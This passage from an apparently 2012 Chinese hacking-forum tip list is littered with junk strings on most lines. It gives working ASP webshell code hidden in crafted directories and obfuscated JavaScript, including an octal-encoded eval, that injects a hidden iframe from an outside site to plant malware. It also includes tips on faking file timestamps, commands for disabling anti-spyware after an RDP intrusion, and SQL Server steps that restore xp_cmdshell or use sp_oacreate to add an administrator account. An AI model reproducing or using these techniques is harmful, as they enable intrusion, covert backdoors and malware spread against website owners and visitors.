用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。2 s/ G5 T5 N6 F. I
- p& y5 a0 j( K1 O9 h+ ^! W
53、隐藏ASP后门的两种方法
" a! [, ^! Q* s( a8 H! Z C4 y1、建立非标准目录:mkdir images..\! Q8 b) n9 U4 R4 I5 }
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp% f) H# H8 V: X& f
通过web访问ASP木马:http://ip/images../news.asp?action=login+ g7 ]5 v0 C6 b1 h( Y5 K6 w& j
如何删除非标准目录:rmdir images..\ /s
% \8 p q) }4 a1 y2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:+ H' I p% i; g6 D6 a* U1 `
mkdir programme.asp
' M7 Z- Z1 j* R9 f; ^' o新建1.txt文件内容:<!--#include file=”12.jpg”-->
2 x. z& z) e7 C7 o9 x新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件+ ~) ^2 \0 r7 k: ?
attrib +H +S programme.asp
; i) d# w# G$ x& C; O; ~0 m; B) J通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt' o3 _) r, e+ \- V6 X. u
1 S/ _ T8 R5 Y54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。- u; _8 L* N+ l. U' {( w Q" \0 @
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
+ z. e7 Z- Y8 G% ]9 ]1 h$ V( {- u6 c* U
55、JS隐蔽挂马. Z2 F& ?; `0 P
1.2 v6 n% i# u f0 R0 x) w
var tr4c3="<iframe src=ht";
1 f3 S$ J! z# @, Ctr4c3 = tr4c3+"tp:/";
! U8 c8 c. A1 B$ L5 Ltr4c3 = tr4c3+"/ww";9 j6 L; b0 {: }7 S6 H# r
tr4c3 = tr4c3+"w.tr4";
% W2 J. y3 D9 T% v* ytr4c3 = tr4c3+"c3.com/inc/m";& `6 L' g, U2 V, z. G) c4 T9 Z
tr4c3 = tr4c3+"m.htm style="display:none"></i";
# b3 q- X- B8 {6 S1 D7 Htr4c3 =tr4c3+"frame>'";0 P, ]! _1 {0 ]5 c# v$ p
document.write(tr4c3);7 W2 _) `4 L8 i, {$ \
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。3 d0 w7 |9 Q0 _6 \8 S5 l
! E ] K, H2 Z& @* r
2.
- I3 @5 W$ Y4 ~( v转换进制,然后用EVAL执行。如+ [9 K; \5 \" m/ F2 ~9 k- m D
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
, B$ n8 n- a" S+ a' R- O不过这个有点显眼。
4 s: W* z$ s+ F# F2 l8 [ u3.6 R( a/ J0 [/ V8 Z* P( ]- Q
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');+ k4 `" U, \: c, ]8 i6 L9 F
最后一点,别忘了把文件的时间也修改下。) g1 ^0 o' ?. v3 J
) w# r1 Z0 B. D9 L/ W56.3389终端入侵常用DOS命令* w( [( z1 }% r* b% w' g; V
taskkill taskkill /PID 1248 /t3 C" V3 w& w3 [& t( x9 ?2 t
8 ~9 ?- ~$ h) ~2 S4 }1 O/ Wtasklist 查进程9 l/ m2 }5 I* k8 {" ~1 X" R
X: ]( ?% I! n& C: c* E/ I1 ?3 h
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限, ~: k$ @; s: Q) s2 `
iisreset /reboot; ]6 o0 \$ h, Z! l2 |( {8 X
tsshutdn /reboot /delay:1 重起服务器
* B7 \$ G4 F. s; Q2 [& U1 ~" G1 M& s8 h: c. k e: Z4 r* T1 l( x
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
9 i A C4 u+ @% X# |: G, a4 X5 P: ~8 T5 u' _+ ~( H
query user 查看当前终端用户在线情况2 l6 |0 E. n$ ]/ j7 X2 R
2 ?1 H/ e0 ^- }: e9 ~要显示有关所有会话使用的进程的信息,请键入:query process *
/ `, G' n" h/ a/ L. r6 A& ?5 O' y+ ~, r! n, }! A
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
- I# F/ P7 F) h5 V' r2 w4 |1 P _& T5 m1 W* P6 B8 P/ h) e% w5 X
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2, ^7 s; [1 \+ \
5 K0 D, d$ }( l( ]% \' |
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
- z; J: H! Y7 i; X v6 X+ p6 F
1 c: b/ n6 Q; h1 S命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启: `- i# |7 P; Z- w% r. u: W
" f9 e* S5 O4 Y# ?( V# l) t4 L命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统0 r- S& _9 }2 `2 e3 w g/ }
# \: K9 a8 b9 O4 \" i _命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。, G% q8 F* m$ v) w8 l
. `/ ~# u' Z' L# @( \
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
+ D5 o b5 _3 e4 ~: Y5 R8 A) |3 E) N4 d0 Z6 ^
56、在地址栏或按Ctrl+O,输入:5 I" K( h, G; J% V9 e
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;$ t8 l: O1 q }( s" \8 X7 p
/ T9 U' l; D, r2 U9 N
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
, z$ n! B% I' b4 S( h
- |. v* w& {: i, N3 Y {57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
1 U) ^( @: C: B0 `3 \: k& k用net localgroup administrators是可以看到管理组下,加了$的用户的。
( I3 V# ^& A7 y5 e! w: Z: a% }7 F
58、 sa弱口令相关命令
) B5 e# d3 T" ?) M! I) A/ W6 J Y3 [2 g8 o$ b
一.更改sa口令方法:
* \1 G8 u g) ?- d* F用sql综合利用工具连接后,执行命令:
: D7 U, S6 L& a/ |( E( Y2 }exec sp_password NULL,'20001001','sa'2 @5 i5 x9 R4 d0 W
(提示:慎用!)
, T! b* n5 b+ u# i; `" `) a3 ?9 B) G, K. `
二.简单修补sa弱口令., r: B0 B9 a/ ^; s; @9 G/ r
: q; }; v+ z; i6 x9 U
方法1:查询分离器连接后执行:
6 t; r ?$ Y/ ^: x- kif exists (select * from# \3 P2 b7 I0 m' u7 ?8 [, w
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and7 Q6 J& d# L# @- R( Z4 F
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)! @- e6 r( B7 v
" r3 J1 I1 N7 F
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'. _2 ~2 O8 A( m) Q2 E7 O
, U" e- N7 l4 B" w
GO1 v8 Y1 w9 y6 y' c% @ Z- B
: T' b `) i1 ?然后按F5键命令执行完毕
2 F. i4 G j6 f1 C$ |8 ?! `! ?2 f1 r7 N4 c
方法2:查询分离器连接后4 i% }2 v/ i: z$ B
第一步执行:use master2 p' s& E9 ~$ P8 n, W0 D M+ w
第二步执行:sp_dropextendedproc 'xp_cmdshell'
1 n! u6 V2 n7 `/ A) _3 {9 U, k然后按F5键命令执行完毕. m6 g; ?% n5 C( M$ ]' b
" x) b* B2 F: H( ]7 T! `2 ^3 M* T7 C
三.常见情况恢复执行xp_cmdshell.
' H) S: o" U) \
- Z, d5 {& }$ X, m i- g8 D2 d& }1 S) w4 Y+ `" _: M( i7 ]" [
1 未能找到存储过程'master..xpcmdshell'.
5 N2 y: O1 w% k* w 恢复方法:查询分离器连接后,
0 Y" ^6 p- B9 K+ ]' v" {1 h. i* g第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int; q+ E# _2 h% s" N
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'& U, ?8 ` }; s
然后按F5键命令执行完毕
8 ?% Z6 o% o& S5 j# C$ B( T) l k, m
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)$ w/ r$ ]1 N+ u2 I, h
恢复方法:查询分离器连接后,
$ p9 e9 {0 C$ |. y' A5 X第一步执行:sp_dropextendedproc "xp_cmdshell"
( Y5 l6 X6 I& x' @第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 D6 r6 f* s$ B, p. o3 y7 e然后按F5键命令执行完毕5 }- M: A: g, j8 {5 Q! W5 g& w4 e
/ m% u( z$ b$ Y- I
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
( q# b5 ~5 r% s" p' i q9 Y恢复方法:查询分离器连接后,
4 G8 I' V9 q' a$ H7 Q: e& T第一步执行:exec sp_dropextendedproc 'xp_cmdshell'5 a) [* \7 s+ O& a
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' % t4 T' [$ }! i! ]5 l
然后按F5键命令执行完毕4 q& L' Z# v5 i, v; m z$ Q# @% j' j9 V
& S3 T h1 Q( r
四.终极方法.
9 `: H7 a3 z5 D! s- a. ~% H如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:& m8 ]. @0 o: f
查询分离器连接后,
: f4 D: j `+ B) t" H2000servser系统:
( ]7 i/ ]" M: o: u- r. qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
! I$ N* E& {4 E4 x* U! S* H& d( ~4 j+ `( F8 @4 x2 |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
& ?2 K' v$ v! Q( o1 O3 B
/ J" P9 a5 Y" G% h) X$ J, Uxp或2003server系统:6 h; Z$ ~, e6 _+ x0 N }
# K6 ~; ~1 y4 {2 e( @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
% T% E) i, L( v9 A. h% r. I B3 q5 \% |* ?* P) O% Z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
& G" W, \7 ?7 o1 Y8 D6 ` |
发表于 2012-9-15 14:13:15
收藏
支持
反对